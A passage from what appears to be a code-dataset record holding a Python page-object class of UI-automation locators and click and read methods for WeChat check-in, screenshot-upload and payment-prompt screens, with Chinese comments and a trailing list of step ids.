'//*[@resource-id=\"com.tencent.mm:id/azz\" and @text=\"重试\"]') # 重试\n\n def click_again_btn(self):\n self.click(self.again_btn_loc)\n\n payment_loc = ('id', 'com.tencent.mm:id/fg3') # 请输入支付密码 文本\n\n def text_payment(self):\n return self.get_text(self.payment_loc)\n\n typewriting_finish_btn_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/z2\" and @text=\"完成\"]') # 输入法上的完成按钮\n\n def element_typewriting_finish_btn(self):\n return self.find_element(self.typewriting_finish_btn_loc)\n\n def click_typewriting_finish_btn(self):\n self.click(self.typewriting_finish_btn_loc)\n\n # 打卡\n\n clock_btn_loc = ('xpath', '//*[contains(@text, \"打卡\")]') # 打卡\n\n def click_clock_btn(self):\n self.click(self.clock_btn_loc)\n\n def element_clock_btn(self):\n return self.find_element(self.clock_btn_loc)\n\n # com.tencent.mm:id/ox\n\n no_clock_btn_loc = ('xpath', '//*[contains(@text, \"你还未开启打卡\")]') # 你还未开启打卡\n\n def element_no_clock_btn(self):\n return self.find_element(self.no_clock_btn_loc)\n\n get_card_btn_loc = ('xpath', '//*[@text=\"获取打卡海报\" and @class=\"android.widget.Button\"]') # 获取打卡海报\n\n def click_get_card_btn(self):\n self.click(self.get_card_btn_loc)\n\n upload_card_btn_loc = ('xpath', '//*[@text=\"上传截图\" and @class=\"android.widget.Button\"]') # 上传截图\n\n def click_upload_card_btn(self):\n self.click(self.upload_card_btn_loc)\n\n again_upload_card_btn_loc = ('xpath', '//*[@text=\"重新上传截图\" and @class=\"android.widget.Button\"]') # 重新上传截图\n\n def click_again_upload_card_btn(self):\n self.click(self.again_upload_card_btn_loc)\n\n save_img_btn_loc = ('xpath', '//*[@text=\"保存图片\" and @class=\"android.widget.Button\"]') # 保存图片\n\n def click_save_img_btn(self):\n self.click(self.save_img_btn_loc)\n\n copy_text_btn_loc = ('xpath', '//*[@text=\"复制发圈文案\" and @class=\"android.widget.Button\"]') # 复制发圈文案\n\n def click_copy_text_btn(self):\n self.click(self.copy_text_btn_loc)\n\n copy_format_btn_loc = ('xpath', '//*[contains(@text, \"发布朋友圈截图规范\")]') # 发布朋友圈截图规范\n\n def element_copy_format_btn(self):\n return self.find_element(self.copy_format_btn_loc)\n\n card_go_btn_loc = ('xpath', '//*[contains(@text, \"关闭小程序,去朋友圈打卡截图\")]') # 关闭小程序,去朋友圈打卡截图\n\n def click_card_go_btn(self):\n self.click(self.card_go_btn_loc)\n\n upload_btn_loc = ('xpath', '//*[@text=\"上传\" and @class=\"android.widget.Button\"]') # 上传\n\n def click_upload_btn(self):\n self.click(self.upload_btn_loc)\n\n today_card_btn_loc = ('xpath', '//*[contains(@text, \"今日已提交打卡\")]') # 今日已提交打卡\n\n def element_today_card_btn(self):\n return self.find_element(self.today_card_btn_loc)\n\n reset_img_btn_loc = ('xpath', '//*[@text=\"重新选择截图\" and @class=\"android.widget.Button\"]') # 重新选择截图\n\n def click_reset_img_btn(self):\n self.click(self.reset_img_btn_loc)\n\n generated_loading_loc = ('xpath', '//*[@resource-id=\"com.tencent.mm:id/cx\" and @text=\"正在生成...\"]') # 正在生成...\n\n def element_generated_loading(self):\n return self.find_element(self.generated_loading_loc)\n\n reminder_btn_loc = ('xpath', '//*[contains(@text, \"温馨提示\")]') # 温馨提示\n\n def element_reminder_btn(self):\n return self.find_element(self.reminder_btn_loc)\n\n page_expired_loc = ('xpath', '//*[contains(@text, \"页面已经过期\")]') # 页面已经过期\n\n def element_page_expired(self):\n return self.find_element(self.page_expired_loc)\n\n x_btn_loc = ('id', 'com.tencent.mm:id/kx')\n\n def click_x_btn(self):\n self.click(self.x_btn_loc)\n", "step-ids": [ 73, 89, 121, 148, 152 ] }
[ 73, 89, 121, 148, 152 ]